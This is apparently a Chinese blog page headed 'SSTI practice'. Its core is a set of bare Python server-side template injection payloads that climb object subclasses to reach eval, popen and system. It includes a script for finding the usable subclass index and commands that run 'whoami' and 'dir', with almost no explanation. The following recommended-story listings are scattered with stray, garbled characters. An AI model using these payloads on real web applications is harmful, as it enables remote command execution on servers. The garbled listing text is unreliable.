SSTI實(shí)踐

().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['__builtins__']['eval']("__import__('os').system('whoami')")

#coding:utf-8
search = "popen"

num = -1
#().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['__builtins__']['eval']("__import__('os').system('whoami')")
for i in ().__class__.__bases__[0].__subclasses__():
    num +=1
    try:
        if search in i.__init__.__globals__.keys():
            print(num,i)
    except Exception as e:
        pass

128 <class 'os._wrap_close'>

().__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['popen']('dir').read()
().__class__.__bases__[0].__subclasses__()[128].__init__.__globals__['system']('dir')

• 人面猴

  序言：七十年代末媳搪，一起剝皮案震驚了整個(gè)濱河市铭段，隨后出現(xiàn)的幾起案子，更是在濱河造成了極大的恐慌秦爆，老刑警劉巖序愚，帶你破解...

  沈念sama閱讀 217,185評論 6贊 503
• 死咒

  序言：濱河連續(xù)發(fā)生了三起死亡事件，死亡現(xiàn)場離奇詭異等限，居然都是意外死亡爸吮，警方通過查閱死者的電腦和手機(jī)，發(fā)現(xiàn)死者居然都...

  沈念sama閱讀 92,652評論 3贊 393
• 救了他兩次的神仙讓他今天三更去死

  文/潘曉璐 我一進(jìn)店門望门，熙熙樓的掌柜王于貴愁眉苦臉地迎上來形娇，“玉大人，你說我怎么就攤上這事筹误⊥┰纾” “怎么了？”我有些...

  開封第一講書人閱讀 163,524評論 0贊 353
• 道士緝兇錄：失蹤的賣姜人

  文/不壞的土叔 我叫張陵厨剪，是天一觀的道長哄酝。 經(jīng)常有香客問我，道長祷膳，這世上最難降的妖魔是什么陶衅？ 我笑而不...

  開封第一講書人閱讀 58,339評論 1贊 293
• ?港島之戀（遺憾婚禮）

  正文 為了忘掉前任，我火速辦了婚禮钾唬，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘侠驯。我一直安慰自己抡秆，他們只是感情好，可當(dāng)我...

  茶點(diǎn)故事閱讀 67,387評論 6贊 391
• 惡毒庶女頂嫁案：這布局不是一般人想出來的

  文/花漫 我一把揭開白布吟策。 她就那樣靜靜地躺著儒士，像睡著了一般。 火紅的嫁衣襯著肌膚如雪檩坚。 梳的紋絲不亂的頭發(fā)上着撩，一...

  開封第一講書人閱讀 51,287評論 1贊 301
• 城市分裂傳說

  那天诅福，我揣著相機(jī)與錄音，去河邊找鬼拖叙。 笑死氓润，一個(gè)胖子當(dāng)著我的面吹牛，可吹牛的內(nèi)容都是我干的薯鳍。 我是一名探鬼主播咖气，決...

  沈念sama閱讀 40,130評論 3贊 418
• 雙鴛鴦連環(huán)套：你想象不到人心有多黑

  文/蒼蘭香墨 我猛地睜開眼，長吁一口氣：“原來是場噩夢啊……” “哼挖滤！你這毒婦竟也來了崩溪？” 一聲冷哼從身側(cè)響起，我...

  開封第一講書人閱讀 38,985評論 0贊 275
• 萬榮殺人案實(shí)錄

  序言：老撾萬榮一對情侶失蹤斩松，失蹤者是張志新（化名）和其女友劉穎伶唯，沒想到半個(gè)月后，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體惧盹，經(jīng)...

  沈念sama閱讀 45,420評論 1贊 313
• ?護(hù)林員之死

  正文 獨(dú)居荒郊野嶺守林人離奇死亡乳幸，尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...

  茶點(diǎn)故事閱讀 37,617評論 3贊 334
• ?白月光啟示錄

  正文 我和宋清朗相戀三年，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了岭参。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片反惕。...

  茶點(diǎn)故事閱讀 39,779評論 1贊 348
• 活死人

  序言：一個(gè)原本活蹦亂跳的男人離奇死亡，死狀恐怖演侯，靈堂內(nèi)的尸體忽然破棺而出姿染，到底是詐尸還是另有隱情，我是刑警寧澤秒际，帶...

  沈念sama閱讀 35,477評論 5贊 345
• ?日本核電站爆炸內(nèi)幕

  正文 年R本政府宣布悬赏，位于F島的核電站，受9級特大地震影響娄徊，放射性物質(zhì)發(fā)生泄漏闽颇。R本人自食惡果不足惜，卻給世界環(huán)境...

  茶點(diǎn)故事閱讀 41,088評論 3贊 328
• 男人毒藥：我在死后第九天來索命

  文/蒙蒙 一寄锐、第九天 我趴在偏房一處隱蔽的房頂上張望兵多。 院中可真熱鬧，春花似錦橄仆、人聲如沸剩膘。這莊子的主人今日做“春日...

  開封第一講書人閱讀 31,716評論 0贊 22
• 一樁弒父案盆顾，背后竟有這般陰謀

  文/蒼蘭香墨 我抬頭看了看天上的太陽怠褐。三九已至，卻和暖如春您宪，著一層夾襖步出監(jiān)牢的瞬間奈懒，已是汗流浹背奠涌。 一陣腳步聲響...

  開封第一講書人閱讀 32,857評論 1贊 269
• 情欲美人皮

  我被黑心中介騙來泰國打工， 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留磷杏，地道東北人溜畅。 一個(gè)月前我還...

  沈念sama閱讀 47,876評論 2贊 370
• 代替公主和親

  正文 我出身青樓，卻偏偏與公主長得像茴丰，于是被迫代替她去往敵國和親达皿。 傳聞我的和親對象是個(gè)殘疾皇子，可洞房花燭夜當(dāng)晚...

  茶點(diǎn)故事閱讀 44,700評論 2贊 354

推薦閱讀更多精彩內(nèi)容

• Python安全審計(jì)

  【轉(zhuǎn)】http://bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPyt...

  fatshi閱讀 1,596評論 0贊 1
• 15峦椰、python模塊和包

  模塊和包 一 模塊 1 什么是模塊？ 常見的場景：一個(gè)模塊就是一個(gè)包含了python定義和聲明的文件汰规，文件名就是...

  go以恒閱讀 2,271評論 0贊 4
• 無標(biāo)題文章

  # Python 資源大全中文版 我想很多程序員應(yīng)該記得 GitHub 上有一個(gè) Awesome - XXX 系列...

  小邁克閱讀 2,985評論 1贊 3
• 不一般的屌絲逆襲記 ——《代理閻王》書評

  文/藍(lán)染馨顏 去年看《夏洛特?zé)馈返臅r(shí)候汤功，就有人評價(jià)它是一部“青春的贊歌”，更有人說這部影片讓他看到了“中國電影的...

  雁北堂閱讀 852評論 0贊 0
• 人的潛力無極限

  在兒子十歲這一年溜哮，我懷孕了滔金，并且決定留下這個(gè)小生命。還沒從懷孕的欣喜中走出來就被孕吐打垮了茂嗓，每天什么東西也吃不下餐茵，...

  5ef7367cea56閱讀 377評論 0贊 1